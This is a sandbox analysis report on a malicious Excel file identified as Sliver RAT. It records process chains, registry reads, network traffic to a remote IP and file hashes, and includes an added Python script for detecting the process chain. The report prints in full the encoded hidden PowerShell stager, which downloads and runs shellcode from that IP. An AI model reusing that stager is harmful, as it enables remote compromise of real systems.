Analysis Overview
SHA256
dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578
Threat Level: Known bad
The file dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578 was found to be: Known bad.
Malicious Activity Summary
Sliver family
Sliver RAT v2
SliverRAT
Process spawned unexpected child process
Office macro that triggers on suspicious action
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 21:16
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 21:16
Reported
2024-11-10 21:19
Platform
win7-20241010-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g7xy63dt.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC45.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCC44.tmp"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 824
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | 194.182.164.149 | tcp |
Files
memory/2620-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2620-1-0x000000007260D000-0x0000000072618000-memory.dmp
memory/2620-9-0x0000000006230000-0x0000000006330000-memory.dmp
memory/2620-8-0x0000000006230000-0x0000000006330000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\g7xy63dt.cmdline
| MD5 | 103aa305c0d49e651fd17237c7bd4140 |
| SHA1 | 1db7c88478e3d2861723c5b702c86279e2c978fa |
| SHA256 | 614d95a155f2682004dc54bae92625e8a6110e48fc5c6d7a8643d4b718f31ddb |
| SHA512 | d2fa70659af3aa8808b57784f76fa5f719609f79fdc5355a4aebdf3e58f258f34e191f465b18c13da325af130032e8ea120e85541d593aa07593fdbbb8d955fc |
\??\c:\Users\Admin\AppData\Local\Temp\g7xy63dt.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCC44.tmp
| MD5 | 3bdb4c0ff50ac8db2816ab3828972dbc |
| SHA1 | 445846e2b40ea735028682a2b73773a3bf3b87ee |
| SHA256 | 078938aa1ffa8791964a942dd3a11bda900c01538156d8bbac2dab100d265a50 |
| SHA512 | e6a7f9d098d43c06924050de7a00fc01f46c5465435d846f19d46f7ece4c391c3d511f235f696772c39a9a009b968b1d55606407c53b3c780ef5edeab9d11b6a |
C:\Users\Admin\AppData\Local\Temp\RESCC45.tmp
| MD5 | 2718fbc41bd4b9ba2c492c36ae29cdd7 |
| SHA1 | 7afcb9109e85ea22300d0127df08b2b94b98cf4f |
| SHA256 | 5033ec0e95c464be140d024d09c435689be608b9ea177de2649292ff346a9963 |
| SHA512 | a77773572b71d059b70154ed0d803a14450988342a020087286ce851c5a0e6f1783476469fb894595c8adce64e273d8e0c3846bdd2f5dc06c6a61e919202d8cb |
C:\Users\Admin\AppData\Local\Temp\g7xy63dt.dll
| MD5 | d2b609e9105a9762694dc1bb78e0251a |
| SHA1 | 727e6a3b3e528336b0a41cd8772a721ceb58826b |
| SHA256 | 6f0f1a4aed1675de5922a8a1d3e1dca64f73cf3af3ecc864d1d7c92972d0dc04 |
| SHA512 | 48da9ddf4a163d84b6db47b4d0a030e662dd301b9e8c02609ff892977d60f1965594959e49c388c89864b015a617c3a0b037fd58eec56ee0be4135c7d7185c81 |
C:\Users\Admin\AppData\Local\Temp\g7xy63dt.pdb
| MD5 | b82af3e1871c8e0c8eacaee752f41107 |
| SHA1 | a2a9a9df5d858386387069886e7ed4a8abf354bf |
| SHA256 | 7b26fe257d10bb5500f26e1d7b3cb8599c58f5e8289571d1410e73c6d85160b5 |
| SHA512 | 78d117484aa2fb222069a8f4af7fa57ccd8fa265d268816f53b87a611ace0c3d4fb921baf348177b8f79ffe130235e55e09650147d19d887c6637f3e0c279bfe |
C:\Users\Admin\AppData\Local\Temp\CabE301.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2620-43-0x000000007260D000-0x0000000072618000-memory.dmp
memory/2620-44-0x0000000006230000-0x0000000006330000-memory.dmp
memory/2952-45-0x0000000006770000-0x00000000071EE000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 21:16
Reported
2024-11-10 21:19
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1516 wrote to memory of 3924 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1516 wrote to memory of 3924 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3924 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 3924 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 1256 wrote to memory of 3452 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 1256 wrote to memory of 3452 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc [encoded command omitted here: exact duplicate of the behavioral1 powershell.exe command line above]
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp" "c:\Users\Admin\AppData\Local\Temp\phphutyt\CSC2A904C096FD447478D207CE19AE7F1.TMP"
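The WriteProcessMemory entries and the process list above record one lineage: EXCEL.EXE (1516) starts powershell.exe (3924) with -w hidden -Enc, which starts csc.exe (1256), which starts cvtres.exe (3452). The block below is an added example, not from the sandbox report or any vendor product, showing how that chain is detected from process-creation events rather than from a single command line. SAMPLE_EVENTS is constructed to mirror the behavioral2 PIDs and images (the .xls name and the explorer.exe parent are made up); the event fields pid, ppid, image and cmdline are an assumption standing in for whatever your EDR or Sysmon Event ID 1 pipeline emits.

```python
"""Process-tree detection for the chain this report records:
EXCEL.EXE -> powershell.exe (-w hidden -Enc ...) -> csc.exe -> cvtres.exe.

Added example, not from the sandbox report. Event fields are an assumption.
"""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
INTERPRETERS = SHELLS | {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}   # spawned by Windows PowerShell's Add-Type when given source text

ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
HIDDEN_ARG = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")

# Constructed events mirroring the behavioral2 run, plus a benign control (pid 5000).
SAMPLE_EVENTS = [
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1516, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice.xls"'},
    {"pid": 3924, "ppid": 1516, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcA"},
    {"pid": 1256, "ppid": 3924, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline"'},
    {"pid": 3452, "ppid": 1256, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmdline": "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]


def basename(path):
    """Lower-cased image name so the rules do not care about Office14 vs Office16 paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Parent, grandparent, ... of pid; stops at an unknown parent or a PID-reuse loop."""
    seen = {pid}
    cur = by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        cur = by_pid[cur["ppid"]]
        seen.add(cur["pid"])
        yield cur


def detect(events):
    """Return (rule, pid) pairs; rules stack, so the full chain scores above any single hop."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_img = basename(parent["image"]) if parent else ""
        if parent_img in OFFICE_APPS and img in INTERPRETERS:
            alerts.append(("office_spawns_interpreter", e["pid"]))
        if img in SHELLS and ENCODED_ARG.search(e["cmdline"]):
            severity = "high" if HIDDEN_ARG.search(e["cmdline"]) else "medium"
            alerts.append((f"powershell_encoded_command_{severity}", e["pid"]))
        if img in COMPILERS and parent_img in SHELLS:
            alerts.append(("powershell_inline_compile", e["pid"]))
        if img in COMPILERS:
            # Walk up past the shell: a compiler whose lineage started in Office is the whole chain.
            chain = [basename(a["image"]) for a in ancestors(by_pid, e["pid"])]
            if any(c in INTERPRETERS for c in chain) and any(c in OFFICE_APPS for c in chain):
                alerts.append(("office_to_inline_compile_chain", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The csc.exe hop is a Windows PowerShell 5.1 behaviour: pwsh compiles Add-Type source in-process, so the office_to_inline_compile_chain rule will not fire there and the Office-to-interpreter and encoded-command rules have to carry the detection on their own. The benign control event (a script run from Explorer with -File) trips none of the rules, which is the false-positive case to keep in the test set when the rule is tuned.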
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 102.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| CH | 194.182.164.149:8080 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 149.164.182.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| CH | 194.182.164.149:443 | | tcp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | | tcp |
| US | 8.8.8.8:53 | 66.208.201.84.in-addr.arpa | udp |
| CH | 194.182.164.149:443 | | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
Files
memory/1516-4-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-3-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-1-0x00007FF88648D000-0x00007FF88648E000-memory.dmp
memory/1516-0-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-2-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-7-0x00007FF846470000-0x00007FF846480000-memory.dmp
memory/1516-6-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-5-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-10-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-11-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-9-0x00007FF8863F0000-0x00007FF8865E5000-memory.dmp
memory/1516-12-0x00007FF844410000-0x00007FF844420000-memory.dmp
